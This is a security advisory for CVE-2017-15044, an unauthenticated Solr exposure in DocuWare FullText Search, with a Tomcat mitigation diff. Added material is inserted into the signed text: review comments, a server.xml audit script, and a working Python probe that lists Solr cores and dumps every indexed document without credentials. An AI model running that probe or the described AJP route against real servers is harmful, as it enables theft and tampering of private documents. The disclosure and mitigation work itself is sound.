Message-Id: <F55CBB11-EB09-43C1-A6C3-7F77F3D06379@sharp.fm>
Date: Mon, 20 Nov 2017 10:37:02 +0200
From: Graham Leggett <minfrin@...rp.fm>
To: bugtraq@...urityfocus.com
Subject: [CVE-2017-15044] DocuWare FullText Search - Incorrect Access Control
 vulnerability

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256



CVE-2017-15044: DocuWare FullText Search - Incorrect Access Control vulnerability

Severity: High

- ------------------------------------------

Vendor:

DocuWare Europe GmbH
Therese-Giehse-Platz 2 82110 Germering Germany

- ------------------------------------------

Description:

The default installation of DocuWare FullText Search server allows remote
users to connect to the embedded Solr service and download and/or modify all
searchable text, bypassing the access control features of the DocuWare user
interfaces and API. The vulnerability can be exploited remotely, and allows
both escalation of privileges and information disclosure.

- ------------------------------------------

Additional Information:

Based on the manual at http://help.docuware.com/en/#b57870t49903n78031 the
default behaviour of DocuWare is as follows:

"This shows the URL and the address of the Tomcat server that you are
using for the full text in DocuWare. The URL of the connection set up
by the system by default is "http://<hostname>:9013"."

Because the Tomcat Connector is configured without an address attribute,
this default binds the embedded Solr server to all network interfaces of the
machine, and exposes all indexed data to any HTTP client able to reach the
port, without authentication or any other access control.

While the manual refers to port 9013, the vulnerability was discovered on a
server bound to port 9012 instead.

- ------------------------------------------

Mitigation:

To mitigate the issue, modify the server.xml file of the embedded Tomcat
server that hosts DocuWare FullText Search, add address="localhost" to the
Connector elements as follows, and restart the service so that the new
configuration is read:

- --- server.xml-orig	2017-11-19 22:33:55.049241032 +0200
+++ server.xml	2017-11-19 22:33:19.307923621 +0200
@@ -66,7 +66,7 @@
          APR (HTTP/AJP) Connector: /docs/apr.html
          Define a non-SSL HTTP/1.1 Connector on port 8080
     -->
- -    <Connector port="9012" protocol="HTTP/1.1"
+    <Connector port="9012" address="localhost" protocol="HTTP/1.1"
                connectionTimeout="20000"
                redirectPort="8443" />
     <!-- A "Connector" using the shared thread pool-->
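Review bot: the hunk only touches the Connector on port 9012, while the advisory notes that the manual documents 9013 for the same service; an installation whose Connector carries port="9013" needs the same address="localhost" attribute, so apply the change to the HTTP/1.1 Connector by role rather than by the literal port. Also, address="localhost" is resolved by the host (it may yield 127.0.0.1 or ::1 depending on the hosts file); if the DocuWare connection URL from the manual uses a specific loopback address, bind to that literal address so that the local client and the listener agree on the address family.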
@@ -88,7 +88,7 @@
     -->
 
     <!-- Define an AJP 1.3 Connector on port 8009 -->
- -    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
+    <Connector port="8009" address="localhost" protocol="AJP/1.3" redirectPort="8443" />
 
 
     <!-- An Engine represents the entry point (within Catalina) that processes
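Review bot: binding the AJP Connector on 8009 to localhost leaves a listener that any local process can still reach; since the advisory describes it as merely exposing the same Solr service over a second protocol and nothing in the hunk front-ends Tomcat over AJP, commenting the Connector out entirely (or removing it) is the safer change unless a local AJP proxy is known to depend on it. Whichever option is chosen, verify after the restart that 8009 is no longer listening on a non-loopback address.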

For more complex deployments where limiting the client to localhost is
not an option (for example, when the DocuWare application server runs on a
different host), see the Apache Tomcat manual on valve configuration; the
RemoteAddrValve restricts clients by source IP address:

https://tomcat.apache.org/tomcat-8.0-doc/config/valve.html#Access_Control

Placing the DocuWare FullText Search server behind a firewall may offer some
mitigation against this vulnerability, but only if the firewall blocks ports
9012/9013 and 8009:

- - from the internet;
- - from users inside the corporate or internal network; and
- - from other servers, routers and any other devices that share a network
with DocuWare FullText Search.

It is prudent to assume that a typical firewall installation does not meet
all of the requirements above, and therefore to treat all installations as
potentially vulnerable.
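The server.xml change above and the RemoteAddrValve alternative are easy to get half right (one Connector patched, the other forgotten, or a valve with a permissive pattern). The following audit script, added here as an example and not part of the advisory or of DocuWare's or Tomcat's code, parses a server.xml and reports every Connector that a remote client can reach. The embedded server.xml fragments are constructed from the diff above; the valve pattern and the DocuWare_FT file layout are assumptions.

```python
"""Audit a Tomcat server.xml for Connectors that listen on all interfaces.

Added example for this advisory, not DocuWare's or Tomcat's code. A Connector
without an address attribute binds every interface (0.0.0.0 / ::); a
RemoteAddrValve under the same Service is treated as covering the Connector,
but its allow pattern is reported so it can be reviewed by hand.
"""
import ipaddress
import sys
import xml.etree.ElementTree as ET

LOOPBACK_NAMES = {"localhost", "ip6-localhost", "ip6-loopback"}
REMOTE_ADDR_VALVE = "org.apache.catalina.valves.RemoteAddrValve"


def is_loopback(address):
    """True if the Connector address keeps the listener on the local host only."""
    if address is None:
        return False  # no address attribute: Tomcat binds every interface
    if address.lower() in LOOPBACK_NAMES:
        return True
    try:
        return ipaddress.ip_address(address).is_loopback
    except ValueError:
        return False  # some other hostname: resolve it yourself before trusting it


def audit_connectors(server_xml):
    """One dict per Connector: port, protocol, bound address, whether a remote
    client can reach it, and any RemoteAddrValve allow patterns in the Service."""
    root = ET.fromstring(server_xml)
    findings = []
    for service in root.iter("Service"):
        valves = [v.get("allow", "") for v in service.iter("Valve")
                  if v.get("className") == REMOTE_ADDR_VALVE]
        for conn in service.findall("Connector"):
            addr = conn.get("address")
            findings.append({
                "port": conn.get("port"),
                "protocol": conn.get("protocol", "HTTP/1.1"),
                "address": addr or "0.0.0.0 (all interfaces)",
                "remote_exposed": not is_loopback(addr) and not valves,
                "valve_allow": valves,
            })
    return findings


def exposed_ports(server_xml):
    """Ports of Connectors reachable from other hosts (sorted as strings)."""
    return sorted(f["port"] for f in audit_connectors(server_xml) if f["remote_exposed"])


# Constructed fragments modelled on the diff in the advisory (not real DocuWare files).
ORIGINAL_SERVER_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="9012" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443" />
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443" />
    <Engine name="Catalina" defaultHost="localhost">
      <Host name="localhost" appBase="webapps" />
    </Engine>
  </Service>
</Server>"""

FIXED_SERVER_XML = ORIGINAL_SERVER_XML.replace(
    'port="9012" protocol', 'port="9012" address="localhost" protocol').replace(
    'port="8009" protocol', 'port="8009" address="localhost" protocol')

# Valve alternative: only the assumed DocuWare application servers may connect.
VALVE_SERVER_XML = ORIGINAL_SERVER_XML.replace(
    '<Host name="localhost" appBase="webapps" />',
    r'<Host name="localhost" appBase="webapps">'
    r'<Valve className="org.apache.catalina.valves.RemoteAddrValve" allow="10\.0\.1\.(10|11)" />'
    r'</Host>')


def report(server_xml):
    for f in audit_connectors(server_xml):
        state = "EXPOSED" if f["remote_exposed"] else "ok"
        print(f'{state:8} port {f["port"]:>5} {f["protocol"]:9} address={f["address"]}'
              + (f' valve allow={f["valve_allow"]}' if f["valve_allow"] else ""))


if __name__ == "__main__":
    if len(sys.argv) > 1:  # audit a real file: python audit_server_xml.py /path/to/server.xml
        with open(sys.argv[1], encoding="utf-8") as fh:
            report(fh.read())
    else:
        for label, xml_text in (("original", ORIGINAL_SERVER_XML), ("fixed", FIXED_SERVER_XML),
                                ("valve", VALVE_SERVER_XML)):
            print(f"--- {label}")
            report(xml_text)
```

Run it against the live server.xml after the change and again after the restart; the parse only proves what the file says, so confirm the listening addresses with the operating system's socket listing as well.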

- ------------------------------------------

Vulnerability Type:

Incorrect Access Control.

- ------------------------------------------

Affected Product Code Base:

DocuWare 6.9

Appears to affect all versions in v6.x, including the most recent 6.11.

- ------------------------------------------

Affected Component:

DocuWare FullText Search

- ------------------------------------------

Attack Vectors:

To exploit the vulnerability, the attacker needs to point a web browser at
the Solr application of the embedded DocuWare FullText Search server on the
exposed port (9012/9013) and path (/solrt).

Alternatively, port 8009 exposes the same service via the AJP protocol.
Configure a reverse proxy that translates AJP into HTTP (for example Apache
httpd with mod_proxy_ajp) and use a web browser to view the data as described
above.

The full contents of the Docuware FullText Search server can be browsed,
downloaded, modified or deleted using the Solr administration interface.
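The exposure described above can be confirmed without a browser. The script below is an added example, not code from the advisory or from DocuWare: it lists the Solr cores an unauthenticated client can see and pages through one core's documents with the standard Solr CoreAdmin STATUS and select handlers. The /solrt path is the one the advisory reports; the host, port, core name, document fields and the canned responses used for the offline run are constructed assumptions, and the Solr version embedded by DocuWare is not known.

```python
"""Probe an exposed DocuWare FullText Search (embedded Solr) server over HTTP.

Added example for this advisory, not code from the advisory or from DocuWare.
It uses two standard Solr handlers: CoreAdmin STATUS (which cores exist) and
a match-all select query paged with start/rows (dump one core). The sample
responses below are constructed so the script runs offline.
"""
import json
import sys
import urllib.error
import urllib.request
from urllib.parse import parse_qs, urlencode, urlsplit

SOLR_PATH = "/solrt"   # path reported in the advisory; a stock Solr uses /solr
PAGE_ROWS = 100


def core_status_url(base, path=SOLR_PATH):
    """CoreAdmin STATUS: lists every core (index) the server hosts."""
    return f"{base}{path}/admin/cores?" + urlencode({"action": "STATUS", "wt": "json"})


def select_url(base, core, start=0, rows=PAGE_ROWS, path=SOLR_PATH):
    """Match-all query against one core, one page of rows starting at start."""
    params = {"q": "*:*", "wt": "json", "start": start, "rows": rows}
    return f"{base}{path}/{core}/select?" + urlencode(params)


def parse_cores(status):
    return sorted(status.get("status", {}))


def parse_select(resp):
    r = resp["response"]
    return int(r["numFound"]), list(r["docs"])


def http_fetch(url, timeout=10):
    """Plain unauthenticated GET; that this suffices is the vulnerability."""
    with urllib.request.urlopen(url, timeout=timeout) as fh:
        return json.load(fh)


def exposed_cores(fetch, base, path=SOLR_PATH):
    """Cores reachable without credentials, or [] when the endpoint does not
    answer (closed port, loopback bind, RemoteAddrValve, firewall)."""
    try:
        return parse_cores(fetch(core_status_url(base, path)))
    except (OSError, ValueError):   # URLError/HTTPError are OSErrors; bad JSON is ValueError
        return []


def dump_core(fetch, base, core, rows=PAGE_ROWS, path=SOLR_PATH):
    """Page through every document of a core with start/rows."""
    docs, start, total = [], 0, None
    while total is None or start < total:
        total, page = parse_select(fetch(select_url(base, core, start, rows, path)))
        if not page:
            break   # server claims more documents than it returns: stop rather than loop
        docs.extend(page)
        start += len(page)
    return docs


# Constructed sample data standing in for a live server (assumed core and field names).
SAMPLE_STATUS = {"status": {"DocuWare_FT": {"name": "DocuWare_FT"}, "test_core": {"name": "test_core"}}}
SAMPLE_DOCS = [{"id": f"doc-{i}", "content": f"indexed text of document {i}"} for i in range(7)]


def fake_fetch(url):
    """Offline stand-in for http_fetch that answers from the constructed samples."""
    parts = urlsplit(url)
    q = {k: v[0] for k, v in parse_qs(parts.query).items()}
    if parts.path.endswith("/admin/cores"):
        return SAMPLE_STATUS
    if parts.path.endswith("/select"):
        docs = SAMPLE_DOCS if "/DocuWare_FT/" in parts.path else []
        start, rows = int(q.get("start", 0)), int(q.get("rows", PAGE_ROWS))
        return {"response": {"numFound": len(docs), "start": start, "docs": docs[start:start + rows]}}
    raise urllib.error.HTTPError(url, 404, "not found", None, None)


if __name__ == "__main__":
    # usage: python probe_fts.py http://fts.example:9012   (no argument: offline demo)
    live = len(sys.argv) > 1
    base = sys.argv[1] if live else "http://fts.example:9012"
    fetch = http_fetch if live else fake_fetch
    cores = exposed_cores(fetch, base)
    print("exposed cores:", cores or "none (not exposed, or unreachable)")
    for core in cores:
        print(f"{core}: {len(dump_core(fetch, base, core))} documents readable without credentials")
```

An empty core list from a host that should be running the service is the expected result after the mitigation; a non-empty list from any address other than the machine itself means the fix has not taken effect.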

- ------------------------------------------

References:

https://www.docuware.com/document-management-products-and-services/docuware-premises
http://help.docuware.com/en/#b57870t49903n78031

- ------------------------------------------

Disclosure Timeline:

2017-09-30: Vendor disclosure.
2017-10-05: CVE issued.
2017-10-24: Vendor acknowledgement of the security hole with Docuware internal bug
number 203945, but no commitment for a fix: "Therefore we can’t specify any
date or timeframe on which you can expect the problem to be fixed I’m
afraid."
2017-10-25: Request for an arrangement for coordinated disclosure, request
escalated internally, however request ignored.
2017-11-03: Second request for an arrangement for coordinated disclosure,
request escalated internally again, however request ignored again.
2017-11-20: Full disclosure with details of mitigation.

- ------------------------------------------

Discoverer:

Graham Leggett <minfrin sharp fm>

